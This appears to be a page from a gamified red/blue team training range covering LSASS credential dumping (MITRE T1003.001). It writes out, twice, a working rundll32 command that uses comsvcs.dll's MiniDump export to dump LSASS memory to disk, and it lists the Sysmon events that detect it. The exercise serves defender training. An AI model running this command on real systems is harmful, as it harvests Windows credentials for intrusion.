DAY #19 (TODAY'S RANGE)// DUAL-MODE ATTACK & DEFEND RANGE
NEXT:20:01:29
EDR & Process TelemetryMITRE T1003.001Tier 1: Junior Analyst
Comsvcs MiniDump LSASS Execution
A high-priority endpoint alert flagged an anomalous rundll32.exe invocation spawning from an interactive command prompt on an accounting workstation.
DUAL-PERSPECTIVE SCORECARD
0 DAY STREAK
0
Red Exploits
0
Blue Hunts
0
Purple Master
0
Engaged
OFFENSIVE STAGING DECK // MITRE T1003.001
Living-off-the-Land (LOLBin)ADVERSARY OBJECTIVETACTIC: TA0006 // Credential Access
Execute the comsvcs.dll MiniDump export (#24) against target PID 672 to write LSASS process memory to disk.
STAGING EXECUTION COMMAND
rundll32.exe C:\windows\System32\comsvcs.dll, #24 672 C:\temp\lsass.dmp full
RAW PAYLOAD SCRIPT
rundll32.exe C:\windows\System32\comsvcs.dll, #24 672 C:\temp\lsass.dmp full
TARGET: FINANCE-WKSTN-04 (10.10.40.12)
TELEMETRY BRIDGE PIPELINEAWAITING ATTACK
In Red Team Mode, executing your exploit vector sends real-time anomalous events to the victim endpoint’s EDR forwarder.
FORWARDER HOOK: Sysmon Event ID 1 (Process Create) & Sysmon Event ID 10 (ProcessAccess)
VICTIM INGEST: Sysmon / Event 4688 / EDR Agent
DETECTION SIGNATURE: MITRE ATT&CK T1003.001
STATUS: AWAITING EXPLOITATION STAGE
Click 'FIRE ATTACK VECTOR' or type fire in the terminal below to generate the target log.
C2 FRAMEWORK: Interactive cmd.exe SessionEXPLOIT ID: drill-001
operator@shadow-c2:~/payloads/T1003.001$ // C2 OFFENSIVE TERMINAL
[!] RED TEAM OFFENSIVE ENGAGEMENT // C2 OPERATOR STAGING CONSOLE
[*] TARGET HOST: FINANCE-WKSTN-04 (10.10.40.12) | C2 PROTOCOL: Interactive cmd.exe Session
[*] OBJECTIVE: Execute the comsvcs.dll MiniDump export (#24) against target PID 672 to write LSASS process memory to disk.
Type 'fire' or 'deploy' to execute payload, or run staging commands directly. Type 'help' for command manual.
QUICK ACTIONS:
TARGET #19 OF 18 AVAILABLE